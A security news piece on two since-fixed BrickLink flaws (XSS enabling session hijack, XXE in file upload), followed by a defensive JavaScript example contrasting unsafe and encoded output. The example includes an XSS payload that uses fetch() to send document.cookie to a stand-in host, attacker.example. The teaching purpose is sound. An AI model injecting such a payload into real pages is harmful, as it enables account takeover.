LEGO BrickLink bugs let hackers hijack accounts, breach servers (Security News, December 2022)

Security researchers have disclosed two API security vulnerabilities in BrickLink.com, the LEGO Group's official marketplace for second-hand and vintage LEGO bricks.
BrickLink is the world's largest online community of LEGO fans, with over a million registered members.
The two issues, found by Salt Security, could have allowed an attacker to take over members' accounts, access and steal personally identifiable information stored on the platform, or even reach internal production data and compromise internal servers.
Salt Security's analysts found the vulnerabilities while experimenting with user input fields on the BrickLink website.
The first was a cross-site scripting (XSS) flaw in one of those input fields. On its own, XSS gives an attacker script execution in the victim's browser; because the victim's Session ID was also exposed on a different page of the site, the injected script could read it and pass it to the attacker, who could then hijack the session and take over the account.
The second, an XML External Entity (XXE) injection in a file-upload feature, is the issue that exposed internal server data.
The researchers reported both vulnerabilities to LEGO, and the company has since fixed all issues.
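The XSS half of the chain above comes down to a search field whose value is reflected into the page without encoding. The following is an added example, not BrickLink's code or Salt Security's proof of concept: a hypothetical "find username" result template rendered once unsafely and once with HTML-body encoding, plus a small check that lists which tags reach the browser. The payload, function names and attacker domain are all constructed for illustration.

```javascript
// Added example (not BrickLink's code): reflected XSS in a hypothetical
// "find username" search result, and the contextual output encoding that
// stops it. All names, the payload and the attacker URL are constructed.

// Encode text for insertion into an HTML element body. The five characters
// below are the ones that can change parsing context in that position.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the user-controlled query is concatenated straight into markup,
// so anything that looks like a tag becomes a tag.
function renderSearchUnsafe(query) {
  return `<p>No users found matching: ${query}</p>`;
}

// Hardened: same template, but the query is encoded for the HTML body context.
function renderSearchSafe(query) {
  return `<p>No users found matching: ${escapeHtml(query)}</p>`;
}

// Constructed payload of the kind a malicious link could carry in the query
// parameter. It exfiltrates whatever the script can read in the victim's
// page; in the BrickLink case that was a Session ID rendered on another page.
const PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/?s=\'+document.cookie)">';

// Crude check used here to show the difference: list the tag names present
// in a rendered fragment. The template contributes exactly one <p>; any
// other tag came from user input.
function tagNames(html) {
  const names = [];
  const re = /<([a-zA-Z][a-zA-Z0-9]*)/g;
  let m;
  while ((m = re.exec(html)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Stand-alone demonstration.
console.log("unsafe tags:", tagNames(renderSearchUnsafe(PAYLOAD))); // [ 'p', 'img' ]
console.log("safe tags:  ", tagNames(renderSearchSafe(PAYLOAD)));   // [ 'p' ]
```

Two practical points follow from the chain the researchers described. The encoding has to match the context (element body here; attribute values, URLs and inline script each need their own rules), so in a real application it belongs in the templating layer rather than in ad-hoc calls like the one above. And marking the session cookie HttpOnly would not have helped on its own, because the Session ID was readable from page content; identifiers that authenticate a user should not be rendered into any page at all.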